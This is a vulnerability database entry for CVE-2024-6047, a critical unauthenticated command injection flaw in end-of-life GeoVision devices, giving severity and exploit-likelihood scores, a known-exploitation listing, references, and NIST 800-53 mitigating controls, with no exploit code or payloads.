CVE-2024-6047
Published: 17 June 2024
Summary
CVE-2024-6047 is a critical-severity OS Command Injection (CWE-78) vulnerability in Geovision Gvlx 4. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 1.2% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SA-22 (Unsupported System Components) and SI-10 (Information Input Validation).
Deeper analysis
Certain EOL GeoVision devices are affected by an OS command injection vulnerability (CWE-78) because they fail to properly filter user input for specific functionality. The flaw carries a CVSS score of 9.8 and permits unauthenticated remote code execution with full system impact.
Unauthenticated remote attackers can exploit the issue over the network to inject and execute arbitrary system commands on the device without requiring credentials or user interaction.
TW-CERT advisories address the vulnerability in the referenced publications, while an Akamai report documents active exploitation of the affected GeoVision devices in the Mirai IoT botnet. The associated EPSS score has remained high, with a current value of 0.7297 and a peak of 0.7335.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2024-47205
Vulnerability details
Certain EOL GeoVision devices fail to properly filter user input for the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device.
- CWE(s)
- KEV Date Added
- 07 May 2025
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires validation and sanitization of untrusted input, which would block the unsanitized user input that enables the OS command injection.
Mandates controls for unsupported/EOL components (replacement, isolation, or additional protections) precisely because these GeoVision devices receive no patches.
Enforces access-control decisions so that unauthenticated remote actors cannot reach the vulnerable command-execution functionality.